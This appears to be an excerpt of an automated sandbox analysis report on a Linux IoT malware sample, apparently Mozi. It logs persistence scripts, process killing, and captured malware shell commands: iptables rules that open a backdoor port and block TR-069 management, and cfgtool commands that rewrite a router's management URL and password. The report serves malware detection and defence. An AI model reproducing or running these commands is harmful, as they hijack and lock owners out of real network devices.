                Source: /tmp/rIbyGX66Op (PID: 4578)File: /etc/profile.d/vte-2.91.shJump to behavior
                Sample tries to persist itself using System V runlevelsShow sources
                Source: /tmp/rIbyGX66Op (PID: 4578)File: /etc/rcS.d/S95baby.shJump to behavior
                Source: /tmp/rIbyGX66Op (PID: 4578)File: /etc/rc.localJump to behavior
                Terminates several processes with shell command 'killall'Show sources
                Source: /bin/sh (PID: 4582)Killall command executed: killall -9 telnetd utelnetd scfgmgr
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/230/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/231/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/232/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/233/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/234/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/3512/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/359/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/1452/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/3632/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/3518/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/10/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/1339/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/11/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/12/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/13/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/14/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/15/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/16/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/17/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/18/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/19/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/483/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/3527/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/3527/cmdline
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/1/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/2/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/3525/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/3/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/1346/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/3524/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/3524/cmdline
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/4/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/3523/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/5/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/7/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/8/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/9/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/20/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/21/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/22/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/23/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/24/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/25/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/28/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/29/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/1363/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/3541/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/3541/cmdline
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/1362/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/496/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/496/cmdline
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/30/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/31/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/31/cmdline
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/1119/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/3790/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/3791/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/3310/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/3431/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/3431/cmdline
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/3550/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/260/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/263/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/264/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/385/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/144/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/386/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/145/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/146/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/3546/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/3546/cmdline
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/147/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/3303/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/3545/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/148/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/149/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/3543/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/822/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/822/cmdline
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/3308/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/3308/cmdline
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/3429/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/3429/cmdline
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/47/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/48/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/48/cmdline
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/49/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/150/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/271/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/151/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/152/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/153/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/395/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/396/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/154/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/155/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/156/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/1017/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/157/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/158/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/159/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/3432/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/3432/cmdline
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/50/stat
                Source: /usr/bin/killall (PID: 4582)File opened: /proc/51/stat
                Source: /tmp/rIbyGX66Op (PID: 4580)Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
                Source: /tmp/rIbyGX66Op (PID: 4614)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 54753 -j ACCEPT"
                Source: /tmp/rIbyGX66Op (PID: 4648)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 54753 -j ACCEPT"
                Source: /tmp/rIbyGX66Op (PID: 4651)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 54753 -j ACCEPT"
                Source: /tmp/rIbyGX66Op (PID: 4682)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 54753 -j ACCEPT"
                Source: /tmp/rIbyGX66Op (PID: 4708)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 54753 -j ACCEPT"
                Source: /tmp/rIbyGX66Op (PID: 4732)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 54753 -j ACCEPT"
                Source: /tmp/rIbyGX66Op (PID: 4737)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 54753 -j ACCEPT"
                Source: /tmp/rIbyGX66Op (PID: 4741)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 54753 -j ACCEPT"
                Source: /tmp/rIbyGX66Op (PID: 4791)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
                Source: /tmp/rIbyGX66Op (PID: 4794)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
                Source: /tmp/rIbyGX66Op (PID: 4799)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
                Source: /tmp/rIbyGX66Op (PID: 4821)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
                Source: /tmp/rIbyGX66Op (PID: 4845)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
                Source: /tmp/rIbyGX66Op (PID: 4857)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
                Source: /tmp/rIbyGX66Op (PID: 4868)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
                Source: /tmp/rIbyGX66Op (PID: 4897)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
                Source: /tmp/rIbyGX66Op (PID: 4921)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
                Source: /tmp/rIbyGX66Op (PID: 4928)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
                Source: /tmp/rIbyGX66Op (PID: 4937)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
                Source: /tmp/rIbyGX66Op (PID: 4966)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
                Source: /tmp/rIbyGX66Op (PID: 4991)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
                Source: /tmp/rIbyGX66Op (PID: 5017)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
                Source: /tmp/rIbyGX66Op (PID: 5023)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
                Source: /tmp/rIbyGX66Op (PID: 5028)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
                Source: /tmp/rIbyGX66Op (PID: 5049)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
                Source: /tmp/rIbyGX66Op (PID: 5077)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
                Source: /tmp/rIbyGX66Op (PID: 5115)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 8000 -j ACCEPT"
                Source: /tmp/rIbyGX66Op (PID: 5118)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 8000 -j ACCEPT"
                Source: /tmp/rIbyGX66Op (PID: 5122)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 8000 -j ACCEPT"
                Source: /tmp/rIbyGX66Op (PID: 5142)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 8000 -j ACCEPT"
                Source: /tmp/rIbyGX66Op (PID: 5173)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 8000 -j ACCEPT"
                Source: /tmp/rIbyGX66Op (PID: 5200)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 8000 -j ACCEPT"
                Source: /tmp/rIbyGX66Op (PID: 5228)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 8000 -j ACCEPT"
                Source: /tmp/rIbyGX66Op (PID: 5232)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 8000 -j ACCEPT"
                Source: /bin/sh (PID: 4616)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 54753 -j ACCEPT
                Source: /bin/sh (PID: 4650)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 54753 -j ACCEPT
                Source: /bin/sh (PID: 4653)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 54753 -j ACCEPT
                Source: /bin/sh (PID: 4690)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 54753 -j ACCEPT
                Source: /bin/sh (PID: 4716)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 54753 -j ACCEPT
                Source: /bin/sh (PID: 4736)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 54753 -j ACCEPT
                Source: /bin/sh (PID: 4739)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 54753 -j ACCEPT
                Source: /bin/sh (PID: 4748)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 54753 -j ACCEPT
                Source: /bin/sh (PID: 4793)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: /bin/sh (PID: 4796)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: /bin/sh (PID: 4805)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: /bin/sh (PID: 4829)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: /bin/sh (PID: 4878)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: /bin/sh (PID: 4906)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: /bin/sh (PID: 4926)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: /bin/sh (PID: 4931)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: /bin/sh (PID: 4947)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: /bin/sh (PID: 4974)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: /bin/sh (PID: 5000)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: /bin/sh (PID: 5021)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: /bin/sh (PID: 5025)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: /bin/sh (PID: 5034)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: /bin/sh (PID: 5057)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: /bin/sh (PID: 5087)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: /bin/sh (PID: 5117)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8000 -j ACCEPT
                Source: /bin/sh (PID: 5120)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8000 -j ACCEPT
                Source: /bin/sh (PID: 5127)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8000 -j ACCEPT
                Source: /bin/sh (PID: 5152)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8000 -j ACCEPT
                Source: /bin/sh (PID: 5182)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 8000 -j ACCEPT
                Source: /bin/sh (PID: 5210)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8000 -j ACCEPT
                Source: /bin/sh (PID: 5231)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8000 -j ACCEPT
                Source: /bin/sh (PID: 5234)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8000 -j ACCEPT
                Source: /tmp/rIbyGX66Op (PID: 4605)Reads from proc file: /proc/statJump to behavior
                Source: /tmp/rIbyGX66Op (PID: 4578)File: /usr/networks (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /tmp/rIbyGX66Op (PID: 4578)File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /tmp/rIbyGX66Op (PID: 4578)File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /tmp/rIbyGX66Op (PID: 4578)File written: /usr/networksJump to dropped file
                Source: /tmp/rIbyGX66Op (PID: 4578)Shell script file created: /etc/rcS.d/S95baby.shJump to dropped file
                Source: /tmp/rIbyGX66Op (PID: 4578)Shell script file created: /etc/init.d/S95baby.shJump to dropped file
                Source: submitted sampleStderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705: exit code = 0

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Drops files in suspicious directoriesShow sources
                Source: /tmp/rIbyGX66Op (PID: 4578)File: /etc/init.d/S95baby.shJump to dropped file
                Source: /tmp/rIbyGX66Op (PID: 4578)File: /etc/init.d/mountall.shJump to dropped file
                Source: /tmp/rIbyGX66Op (PID: 4578)File: /etc/init.d/checkfs.shJump to dropped file
                Source: /tmp/rIbyGX66Op (PID: 4578)File: /etc/init.d/umountnfs.shJump to dropped file
                Source: /tmp/rIbyGX66Op (PID: 4578)File: /etc/init.d/mountkernfs.shJump to dropped file
                Source: /tmp/rIbyGX66Op (PID: 4578)File: /etc/init.d/checkroot-bootclean.shJump to dropped file
                Source: /tmp/rIbyGX66Op (PID: 4578)File: /etc/init.d/mountnfs-bootclean.shJump to dropped file
                Source: /tmp/rIbyGX66Op (PID: 4578)File: /etc/init.d/bootmisc.shJump to dropped file
                Source: /tmp/rIbyGX66Op (PID: 4578)File: /etc/init.d/checkroot.shJump to dropped file
                Source: /tmp/rIbyGX66Op (PID: 4578)File: /etc/init.d/hwclock.shJump to dropped file
                Source: /tmp/rIbyGX66Op (PID: 4578)File: /etc/init.d/hostname.shJump to dropped file
                Source: /tmp/rIbyGX66Op (PID: 4578)File: /etc/init.d/mountdevsubfs.shJump to dropped file
                Source: /tmp/rIbyGX66Op (PID: 4578)File: /etc/init.d/mountall-bootclean.shJump to dropped file
                Source: /tmp/rIbyGX66Op (PID: 4578)File: /etc/init.d/mountnfs.shJump to dropped file
                Source: /tmp/rIbyGX66Op (PID: 4578)File: /usr/bin/gettext.shJump to dropped file
                Source: /tmp/rIbyGX66Op (PID: 4578)File: /usr/sbin/alsa-info.shJump to dropped file
                Uses known network protocols on non-standard portsShow sources
                Source: unknownNetwork traffic detected: HTTP traffic on port 47738 -> 8443
                Source: /tmp/rIbyGX66Op (PID: 4559)Queries kernel information via 'uname':
                Source: /tmp/rIbyGX66Op (PID: 4578)Queries kernel information via 'uname':
                Source: /tmp/rIbyGX66Op (PID: 4601)Queries kernel information via 'uname':
                Source: /sbin/modprobe (PID: 4622)Queries kernel information via 'uname':
                Source: /usr/share/apport/apport-gtk (PID: 5310)Queries kernel information via 'uname':
                Source: /usr/share/apport/apport-gtk (PID: 5335)Queries kernel information via 'uname':
                Source: kvm-test-1-run.sh.8.drBinary or memory string: ( $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append "$qemu_append $boot_args"; echo $? > $resdir/qemu-retval ) &
                Source: functions.sh0.8.drBinary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
                Source: kvm-test-1-run.sh.8.drBinary or memory string: kill -KILL $qemu_pid
                Source: functions.sh0.8.drBinary or memory string: qemu-system-ppc64)
                Source: kvm-test-1-run.sh.8.drBinary or memory string: echo Monitoring qemu job at pid $qemu_pid
                Source: kvm.sh.8.drBinary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
                Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_pid=$!
                Source: kvm-test-1-run.sh.8.drBinary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
                Source: functions.sh0.8.drBinary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
                Source: kvm-recheck-lock.sh.8.drBinary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
                Source: kvm-test-1-run.sh.8.drBinary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`"
                Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
                Source: functions.sh0.8.drBinary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE"
                Source: kvm.sh.8.drBinary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
                Source: functions.sh0.8.drBinary or memory string: identify_qemu_append () {
                Source: kvm-test-1-run.sh.8.drBinary or memory string: echo Grace period for qemu job at pid $qemu_pid
                Source: functions.sh0.8.drBinary or memory string: qemu-system-x86_64|qemu-system-i386)
                Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_args="-enable-kvm -soundhw pcspk -nographic $qemu_args"
                Source: functions.sh0.8.drBinary or memory string: # Returns our best guess as to which qemu command is appropriate for
                Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
                Source: kvm-test-1-run.sh.8.drBinary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
                Source: kvm-test-1-run.sh.8.drBinary or memory string: QEMU="`identify_qemu $builddir/vmlinux`"
                Source: functions.sh0.8.drBinary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
                Source: functions.sh0.8.drBinary or memory string: identify_qemu_args () {
                Source: kvm-test-1-run.sh.8.drBinary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $builddir/console.log
                Source: functions.sh0.8.drBinary or memory string: qemu-system-x86_64|qemu-system-i386)
                Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
                Source: kvm-test-1-run.sh.8.drBinary or memory string: # Generate -smp qemu argument.
                Source: kvm-test-1-run.sh.8.drBinary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
                Source: functions.sh0.8.drBinary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
                Source: functions.sh0.8.drBinary or memory string: # Output arguments for the qemu "-append" string based on CPU type
                Source: kvm.sh.8.drBinary or memory string: --qemu-args|--qemu-arg)
                Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
                Source: functions.sh0.8.drBinary or memory string: echo $TORTURE_QEMU_CMD
                Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_MAC=$2
                Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
                Source: kvm-test-1-run.sh.8.drBinary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid \([0-9]*\).*$/\1/p" $resdir/Warnings`"
                Source: functions.sh0.8.drBinary or memory string: specify_qemu_cpus () {
                Source: kvm-test-1-run.sh.8.drBinary or memory string: vcpus=`identify_qemu_vcpus`
                Source: functions.sh0.8.drBinary or memory string: echo qemu-system-ppc64
                Source: functions.sh0.8.drBinary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
                Source: kvm.sh.8.drBinary or memory string: checkarg --qemu-args "-qemu args" $# "$2" '^-' '^error'
                Source: functions.sh0.8.drBinary or memory string: qemu-system-ppc64)
                Source: functions.sh0.8.drBinary or memory string: # identify_boot_image qemu-cmd
                Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_ARG="$2"
                Source: kvm-recheck-rcu.sh.8.drBinary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
                Source: functions.sh0.8.drBinary or memory string: # identify_qemu_append qemu-cmd
                Source: functions.sh0.8.drBinary or memory string: identify_qemu_vcpus () {
                Source: functions.sh0.8.drBinary or memory string: # qemu-args already contains "-smp".
                Source: kvm-test-1-run.sh.8.drBinary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
                Source: functions.sh0.8.drBinary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
                Source: functions.sh0.8.drBinary or memory string: echo Cannot figure out what qemu command to use! 1>&2
                Source: functions.sh0.8.drBinary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
                Source: functions.sh0.8.drBinary or memory string: # identify_qemu_vcpus
                Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_CMD="$2"
                Source: functions.sh0.8.drBinary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
                Source: functions.sh0.8.drBinary or memory string: # identify_qemu_args qemu-cmd serial-file
                Source: functions.sh0.8.drBinary or memory string: if test -n "$TORTURE_QEMU_CMD"
                Source: kvm.sh.8.drBinary or memory string: --qemu-cmd)
                Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC
                Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_args=$5
                Source: kvm-test-1-run.sh.8.drBinary or memory string: echo $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
                Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$builddir/console.log"`"
                Source: kvm-test-1-run.sh.8.drBinary or memory string: # Generate qemu -append arguments
                Source: functions.sh0.8.drBinary or memory string: # identify_qemu builddir
                Source: functions.sh0.8.drBinary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable.
                Source: kvm-test-1-run.sh.8.drBinary or memory string: # Generate architecture-specific and interaction-specific qemu arguments
                Source: functions.sh0.8.drBinary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC
                Source: kvm.sh.8.drBinary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
                Source: functions.sh0.8.drBinary or memory string: echo qemu-system-i386
                Source: functions.sh0.8.drBinary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
                Source: functions.sh0.8.drBinary or memory string: echo qemu-system-x86_64
                Source: functions.sh0.8.drBinary or memory string: identify_qemu () {

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsCommand and Scripting Interpreter1.bash_profile and .bashrc1.bash_profile and .bashrc1Masquerading1OS Credential Dumping1Security Software Discovery11Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Standard Port11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScripting12At (Linux)1At (Linux)1File and Directory Permissions Modification1Brute Force1Remote System Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)1Logon Script (Windows)Logon Script (Windows)Scripting12Security Account ManagerSystem Network Configuration Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
